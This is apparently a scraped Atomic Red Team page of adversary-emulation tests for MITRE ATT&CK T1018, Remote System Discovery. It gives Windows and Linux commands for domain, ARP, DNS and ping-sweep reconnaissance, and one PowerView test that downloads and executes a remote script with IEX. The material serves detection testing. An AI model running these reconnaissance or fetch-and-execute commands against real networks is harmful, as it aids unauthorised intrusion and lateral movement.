Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) ornet view
using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex:C:\Windows\System32\Drivers\etc\hosts
or/etc/hosts
) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g.show cdp neighbors
,show arp
).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
Atomic Test #2 - Remote System Discovery - net group Domain Computers
Atomic Test #10 - Adfind - Enumerate Active Directory Computer Objects
Atomic Test #11 - Adfind - Enumerate Active Directory Domain Controller Objects
Atomic Test #16 - Enumerate domain computers within Active Directory using DirectorySearcher
Atomic Test #17 - Enumerate Active Directory Computers with Get-AdComputer
Atomic Test #18 - Enumerate Active Directory Computers with ADSISearcher
Atomic Test #20 - Get-WmiObject to Enumerate Domain Controllers
Atomic Test #21 - Remote System Discovery - net group Domain Controller
Identify remote systems with net.exe.
Upon successful execution, cmd.exe will execute
and display results of local systems on the network that have file and print sharing enabled.1
net.exe view
Supported Platforms: Windows
auto_generated_guid: 85321a9c-897f-4a60-9f20-29788e50bccd
1
command_prompt
!net view /domain
net view
Identify remote systems with net.exe querying the Active Directory Domain Computers group.
Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the “Domain Computers” group. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: f1bf6c8f-9016-4edf-aff9-80b65f5d711f
1
command_prompt
!net group "Domain Computers" /domain
Identify domain controllers for specified domain.
Upon successful execution, cmd.exe will execute nltest.exe against a target domain to retrieve a list of domain controllers. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
| Name | Description | Type | Default Value | |——|————-|——|—————| | target_domain | Domain to query for domain controllers | string | %userdnsdomain%|
1
command_prompt
!nltest.exe /dclist:#{target_domain}
Identify remote systems via ping sweep.
Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: 6db1f57f-d1d5-4223-8a66-55c9c65a9592
| Name | Description | Type | Default Value | |——|————-|——|—————| | start_host | Last octet starting value for ping sweep. | string | 1| | stop_host | Last octet ending value for ping sweep. | string | 254| | subnet | Subnet used for ping sweep. | string | 192.168.1|
1
command_prompt
!for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i
Identify remote systems via arp.
Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574
1
command_prompt
!arp -a
Identify remote systems via arp.
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
Supported Platforms: Linux, macOS
auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951
1
sh
!1
arp -a | grep -v '^?'
1
sh
!1
if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
1
(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)
Identify remote systems via ping sweep.
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
Supported Platforms: Linux, macOS
auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de
| Name | Description | Type | Default Value | |——|————-|——|—————| | start_host | Subnet used for ping sweep. | string | 1| | stop_host | Subnet used for ping sweep. | string | 254| | subnet | Subnet used for ping sweep. | string | 192.168.1|
1
sh
!1
for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done
Powershell script that runs nslookup on cmd.exe against the local /24 network of the first network adaptor listed in ipconfig.
Upon successful execution, powershell will identify the ip range (via ipconfig) and perform a for loop and execute nslookup against that IP range. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f
1
powershell
! Elevation Required (e.g. root or admin)1
2
3
4
5
6
$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]
$pieces = $localip.split(".")
$firstOctet = $pieces[0]
$secondOctet = $pieces[1]
$thirdOctet = $pieces[2]
foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and adidnsdump must be installed, use the get_prereq_command’s to meet the prerequisites for this test. Successful execution of this test will list dns zones in the terminal.
Supported Platforms: Windows
auto_generated_guid: 95e19466-469e-4316-86d2-1dc401b5a959
| Name | Description | Type | Default Value | |——|————-|——|—————| | user_name | username including domain. | string | domain\user| | acct_pass | Account password. | string | password| | host_name | hostname or ip address to connect to. | string | 192.168.1.1| | venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1018|
1
command_prompt
! Elevation Required (e.g. root or admin)"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
1
powershell
!1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
1
if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
1
py -m venv "#{venv_path}"
1
if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=computer) #{optional_args}
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
Supported Platforms: Windows
auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
| Name | Description | Type | Default Value | |——|————-|——|—————| | optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use “-arg” notation to add arguments separated by spaces. | string | |
1
command_prompt
!"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -sc dclist
1
powershell
!1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
1
2
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
Use the ip neighbour command to display the known link layer (ARP table) addresses for hosts sharing the same network segment.
Supported Platforms: Linux
auto_generated_guid: 158bd4dd-6359-40ab-b13c-285b9ef6fa25
1
sh
!1
ip neighbour show
1
sh
!1
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
1
apt-get install iproute2 -y
Use the ip route command to display the kernels routing tables.
Supported Platforms: Linux
auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1
1
sh
!1
ip route show
1
sh
!1
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
1
apt-get install iproute2 -y
Use the netstat command to display the kernels routing tables.
Supported Platforms: Linux
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
1
sh
!1
netstat -r | grep default
Use the ip tcp_metrics command to display the recent cached entries for IPv4 and IPv6 source and destination addresses.
Supported Platforms: Linux
auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388
1
sh
!1
ip tcp_metrics show |grep --invert-match "^127\."
1
sh
!1
if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi;
1
apt-get install iproute2 -y
This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. Reference: Head Fake: Tackling Disruptive Ransomware Attacks. Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
Supported Platforms: Windows
auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
1
powershell
!1
2
3
4
5
6
7
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
$DirectorySearcher.PropertiesToLoad.Add("Name")
$Computers = $DirectorySearcher.findall()
foreach ($Computer in $Computers) {
$Computer = $Computer.Properties.name
if (!$Computer) { Continue }
Write-Host $Computer}
1
powershell
!1
if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
1
write-host "This PC must be manually added to a domain."
The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory. Upon successful execution a listing of Computers will output with their paths in AD. Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
Supported Platforms: Windows
auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
1
powershell
!1
Get-AdComputer -Filter *
The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory. Upon successful execution a listing of computers will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
Supported Platforms: Windows
auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
1
powershell
!1
([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
Supported Platforms: Windows
auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
1
powershell
!1
2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers. Upon successful execution a listing of Systems from AD will output with their paths. Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
Supported Platforms: Windows
auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
1
powershell
!1
2
try { get-wmiobject -class ds_computer -namespace root\directory\ldap -ErrorAction Stop }
catch { $_; exit $_.Exception.HResult }
Identify remote systems with net.exe querying the Active Directory Domain Controller. Upon successful execution, cmd.exe will execute cmd.exe against Active Directory to list the “Domain Controller” in the domain. Output will be via stdout.
Supported Platforms: Windows
auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0
1
command_prompt
!net group /domain "Domain controllers"
This test uses Netscan to identify remote hosts in a specified network range.
Supported Platforms: Windows
auto_generated_guid: b8147c9a-84db-4ec1-8eee-4e0da75f0de5
| Name | Description | Type | Default Value | |——|————-|——|—————| | netscan_path | NetScan exe location | path | PathToAtomicsFolder\..\ExternalPayloads\netscan\64-bit\netscan.exe| | range_to_scan | The IP range to scan with Netscan | string | 127.0.0.1-127.0.0.1|
1
powershell
!1
cmd /c '#{netscan_path}' /hide /auto:"$env:temp\T1018NetscanOutput.txt" /range:'#{range_to_scan}'
1
remove-item "$env:temp\T1018NetscanOutput.txt" -force -erroraction silentlycontinue
1
powershell
!1
if (Test-Path "#{netscan_path}") {exit 0} else {exit 1}
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" "https://www.softperfect.com/download/files/netscan_portable.zip"
Expand-Archive -LiteralPath "PathToAtomicsFolder\..\ExternalPayloads\netscan.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\netscan"